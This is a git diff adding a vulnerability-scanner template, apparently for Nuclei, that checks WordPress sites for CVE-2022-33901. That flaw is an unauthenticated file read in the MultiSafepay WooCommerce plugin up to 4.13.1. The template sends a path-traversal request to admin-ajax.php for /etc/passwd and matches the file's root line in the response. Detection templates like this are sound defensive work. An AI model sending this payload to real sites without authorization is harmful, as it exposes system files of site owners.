diff --git a/cves/2022/CVE-2022-33901.yaml b/cves/2022/CVE-2022-33901.yaml new file mode 100644 index 0000000000..7720c1396e --- /dev/null +++ b/cves/2022/CVE-2022-33901.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-33901 + +info: + name: MultiSafepay plugin for WooCommerce <= 4.13.1 - Unauthenticated Arbitrary File Read + author: theamanrawat + severity: high + description: | + Unauthenticated Arbitrary File Read vulnerability in MultiSafepay plugin for WooCommerce plugin <= 4.13.1 at WordPress. + reference: + - https://wordpress.org/plugins/multisafepay/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-33901 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-33901 + metadata: + verified: "true" + tags: wp-plugin,wp,fileread,unauth,wpscan,cve2022,wordpress,cve,multisafepay + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd" + + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "application/octet-stream" + + - type: regex + part: body + regex: + - "root:.*:0:0:" \ No newline at end of file